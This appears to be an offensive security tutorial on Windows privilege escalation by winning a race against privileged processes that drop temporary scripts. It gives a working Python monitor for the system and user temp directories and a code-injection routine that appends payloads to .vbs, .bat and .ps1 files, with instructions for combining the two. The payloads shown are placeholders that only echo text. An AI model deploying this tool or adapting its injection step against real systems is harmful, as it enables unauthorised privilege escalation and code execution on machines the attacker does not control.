Why does privilege escalation involve watching temporary files for changes?
Because some processes drop a temporary file, execute the code it contains, and delete it once it has run. If the process doing this runs with higher privileges than we have, whatever ends up in that file runs with its privileges.
The idea is to win the race between the file being created and the target program executing it: get our own code into the temporary file before it is run.
We watch the two temporary directories (the system temp directory and the current user's temp directory), one thread per directory. Threads are needed because ReadDirectoryChangesW blocks until a change arrives, so a single thread watching one directory would never get around to the other. Two things to check before relying on this: the account running the monitor needs list permission on the directory (the CreateFile call below asks for FILE_LIST_DIRECTORY, and on a default install a standard user can typically create files in C:\Windows\Temp but not list it, so that watcher may fail with access denied), and the technique is only an escalation if the process executing the dropped script runs at a higher privilege level than the monitor.
Outline:
CreateFile()
ReadDirectoryChangesW()
for action, file_name in results:
    if action == FILE_CREATED:
        build the full path from the directory and file name and report the new file
    if action == FILE_DELETED:
import os
import tempfile
import threading

import win32con
import win32file

# The two temporary directories to watch: the system temp and the current user's temp.
dirs_to_monitor = ["C:\\Windows\\Temp", tempfile.gettempdir()]

# Action codes returned by ReadDirectoryChangesW
FILE_CREATED = 1
FILE_DELETED = 2
FILE_MODIFIED = 3
FILE_RENAMED_FROM = 4
FILE_RENAMED_TO = 5


def start_monitor(path_to_watch):
    # Open a handle to the directory itself. FILE_FLAG_BACKUP_SEMANTICS is required to
    # open a directory handle; FILE_LIST_DIRECTORY is the access right the watch needs.
    FILE_LIST_DIRECTORY = 0x0001
    h_directory = win32file.CreateFile(
        path_to_watch,
        FILE_LIST_DIRECTORY,
        win32con.FILE_SHARE_READ | win32con.FILE_SHARE_WRITE | win32con.FILE_SHARE_DELETE,
        None,
        win32con.OPEN_EXISTING,
        win32con.FILE_FLAG_BACKUP_SEMANTICS,
        None,
    )

    while True:
        try:
            # Blocks until something changes under the directory (True = watch the subtree)
            results = win32file.ReadDirectoryChangesW(
                h_directory,
                1024,
                True,
                win32con.FILE_NOTIFY_CHANGE_DIR_NAME
                | win32con.FILE_NOTIFY_CHANGE_FILE_NAME
                | win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES
                | win32con.FILE_NOTIFY_CHANGE_SIZE
                | win32con.FILE_NOTIFY_CHANGE_LAST_WRITE
                | win32con.FILE_NOTIFY_CHANGE_SECURITY,
                None,
                None,
            )

            for action, file_name in results:
                full_filename = os.path.join(path_to_watch, file_name)

                if action == FILE_CREATED:
                    print("[*] Created %s" % full_filename)
                elif action == FILE_DELETED:
                    print("[-] Deleted %s" % full_filename)
                elif action == FILE_MODIFIED:
                    print("[*] Modified %s" % full_filename)
                    # Dump the contents: this is what the target process just wrote
                    print("[vvv] Dumping contents ....")
                    try:
                        with open(full_filename, "rb") as fd:
                            contents = fd.read()
                        print(contents)
                        print("[^^^] Dump complete.")
                    except OSError:
                        # File already deleted or locked by the target
                        print("[!!!] Failed")
                elif action == FILE_RENAMED_FROM:
                    print("[>] Renamed from: %s" % full_filename)
                elif action == FILE_RENAMED_TO:
                    print("[<] Renamed to: %s" % full_filename)
                else:
                    print("[???] Unknown: %s" % full_filename)
        except Exception:
            # Keep watching even if one read fails (e.g. the buffer overflows on a burst of changes)
            pass


for path in dirs_to_monitor:
    monitor_thread = threading.Thread(target=start_monitor, args=(path,))
    print("Spawning monitoring thread for path: %s" % path)
    monitor_thread.start()
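The monitor above only reports events and dumps file contents; the injection step described earlier (getting our code into the script before the target runs it) is not in it. The following is an added example, not code from the original post, of that step, written without pywin32 so it runs on any platform: handle_events() takes (action, file_name) pairs in the shape ReadDirectoryChangesW returns, and on FILE_MODIFIED appends a payload to known script types, exactly once. The script extensions, the "racemarker" comment string and the payload lines are assumptions, the payloads are harmless placeholders, and the target process that drops and fills the script is simulated inline in demo().

```python
import os
import tempfile

# Action codes in the shape ReadDirectoryChangesW reports them (same values as the monitor).
FILE_CREATED = 1
FILE_DELETED = 2
FILE_MODIFIED = 3
FILE_RENAMED_FROM = 4
FILE_RENAMED_TO = 5

# Script types a privileged process might drop into a temp directory and then execute.
# Each entry: (comment-syntax marker proving we already injected, placeholder payload).
# Assumption: the extensions and payloads below are illustrative; the payloads only echo.
FILE_TYPES = {
    ".vbs": ("'racemarker",
             'Set sh = CreateObject("WScript.Shell")\r\n'
             'sh.Run "cmd.exe /c echo injected", 0, True\r\n'),
    ".bat": ("REM racemarker", "echo injected\r\n"),
    ".ps1": ("#racemarker", "Write-Output 'injected'\r\n"),
}


def inject_code(path, file_types=FILE_TYPES):
    """Append this script type's payload to `path`, once. Returns True if injected."""
    ext = os.path.splitext(path)[1].lower()
    if ext not in file_types:
        return False
    marker, payload = file_types[ext]
    try:
        with open(path, "r+b") as fd:
            contents = fd.read()
            # Our own write fires another MODIFIED event; the marker stops us re-injecting.
            if marker.encode() in contents:
                return False
            fd.seek(0, os.SEEK_END)
            if contents and not contents.endswith(b"\n"):
                fd.write(b"\r\n")
            fd.write(marker.encode() + b"\r\n" + payload.encode() + marker.encode() + b"\r\n")
        return True
    except (FileNotFoundError, PermissionError):
        # Lost the race: the target already deleted the file, or holds it locked.
        return False


def handle_events(directory, results, log=None):
    """Dispatch (action, file_name) pairs the way the monitor loop does; returns the log."""
    log = [] if log is None else log
    for action, file_name in results:
        full_filename = os.path.join(directory, file_name)
        if action == FILE_CREATED:
            log.append(("created", full_filename))
        elif action == FILE_MODIFIED:
            # Inject on MODIFIED rather than CREATED: the file is normally created empty
            # and filled afterwards, so a payload written into the empty file would be
            # overwritten by the target's own write.
            outcome = "injected" if inject_code(full_filename) else "modified"
            log.append((outcome, full_filename))
        elif action == FILE_DELETED:
            log.append(("deleted", full_filename))
        elif action in (FILE_RENAMED_FROM, FILE_RENAMED_TO):
            log.append(("renamed", full_filename))
        else:
            log.append(("unknown", full_filename))
    return log


def demo():
    """Simulate the target dropping, filling and deleting a script; replay the events."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, "task.vbs")
        notes = os.path.join(d, "notes.txt")
        open(script, "wb").close()                      # created empty -> FILE_CREATED
        with open(notes, "wb") as fd:                   # a non-script file, must be left alone
            fd.write(b"not a script\r\n")
        events = handle_events(d, [(FILE_CREATED, "task.vbs"), (FILE_MODIFIED, "notes.txt")])
        with open(script, "wb") as fd:                  # target writes the body -> FILE_MODIFIED
            fd.write(b'WScript.Echo "original"\r\n')
        # The target's write and then our own injection each produce a MODIFIED event.
        handle_events(d, [(FILE_MODIFIED, "task.vbs"), (FILE_MODIFIED, "task.vbs")], events)
        with open(script, "rb") as fd:
            body = fd.read()
        os.remove(script)
        handle_events(d, [(FILE_DELETED, "task.vbs")], events)
        return [outcome for outcome, _ in events], body


if __name__ == "__main__":
    outcomes, body = demo()
    print(outcomes)
    print(body.decode())
```

To use it with the real monitor, call handle_events(path_to_watch, results) in place of the print branches inside the ReadDirectoryChangesW loop. Appending keeps the target's original script intact so it still does what the target expects, and injection on the first MODIFIED event is the window that matters: the target usually creates the file, writes it, and executes it in quick succession, so a lost race shows up as PermissionError (file locked) or FileNotFoundError (already deleted), both of which are reported as a plain "modified" rather than crashing the watcher.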
[Screenshot: the monitor running]